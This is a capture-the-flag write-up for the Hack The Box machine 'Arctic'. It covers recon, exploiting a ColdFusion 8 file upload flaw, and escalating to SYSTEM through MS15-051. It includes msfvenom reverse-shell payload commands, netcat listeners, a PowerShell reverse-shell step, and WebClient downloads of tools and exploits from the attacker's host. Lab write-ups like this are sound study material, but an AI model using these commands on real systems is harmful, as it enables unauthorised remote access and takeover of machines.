HTB: Arctic
- TLDR -

...

Intro:

This was a decent box that just takes a bit of patience. It uses a couple of CVEs to get both user and root. The greatest nuissance of this box is that the website takes 30 seconds to load a page, so lots of patience is required

Recon:

nmap -sT -sV -A -v <target ip> reveals ports 135, 8500, and 49154. 135 is the default port for MSRPC Endpoint Mapper, which reveals what services are mapped to which port. Using impacket's "rpcdump.py", we can see that port 49154 is associated with Task Scheduler. This indicates that we might be able to do some RCE. Nmap shows that port 8500 is ftmp, but doing some googling shows that is could also be the default webserver for Adobe ColdFusion. Navigating to the page shows that the latter is the case.

Getting User:

Checking Exploit DB reveals that Adobe ColdFusion 8 (our version) is vulnerable to an Arbitrary File Upload attack. There is a metasploit module that we can use as framework for our custom attack [1].

The attack works by sending a POST request to a specific file on the server, pretending to upload a text file. We really upload a reverse shell jsp file, generated using msfvenom: msfvenom -p windows/x64/shell_reverse_tcp -f jsp LHOST=<your ip> LPORT=3184 > cmd.jsp. Upload the shell, start a netcat listener, then navigate to the uploaded file which is located at "http://:8500/userfiles/file/cmd.jsp". We get a connection which allows us to get the user flag: type C:\Users\tolis\Desktop\user.txt.

Upgrading to a PowerShell:

I didn't manage to successfully upload a reverse powershell, so instead we need to manually connect back with a new reverse powershell. To upgrade to a powershell, we can run a reverse powershell oneliner in the current shell: powershell -Command '<powershell one-liner>' [2].

Getting Root:

We can enumerate kernel vulnerabilities using Sherlock [3]. To upload the file, the most successful way is to create a webclient object and download the file through that:
$WebClient=New-Object System.Net.WebClient
$WebClient.DownloadFile("http://<your ip>/Sherlock.ps1", "C:\Users\tolis\AppData\Local\Temp\s.ps1")
Import-Module .\s.ps1
Find-AllVulns

The final command will reveal all the potential vulnerabilities the system is affected by. In our case, we will attack MS15-051.

We can download an exploit from SecWiki [4] and upload it using the WebClient object we made (I uploaded it as "ms.exe"). Once it's been uploaded, we can confirm it works through: .\ms.exe "whoami", which will return nt authority/system. To get a root shell, we upload a reverse shell exe generated using msfvenom. Finally, start a netcat listener and run the reverse shell using the exploit: .\ms.exe .\rshl.exe. Get the root flag: type C:\Users\Administrator\Desktop\root.txt




Resources:

Adobe ColdFusion 8 AFU


PowerShell One-Liner


Sherlock PowerShell Script


SecWiki MS15-051 [EXTERNAL]




Last edit: 2021.09.04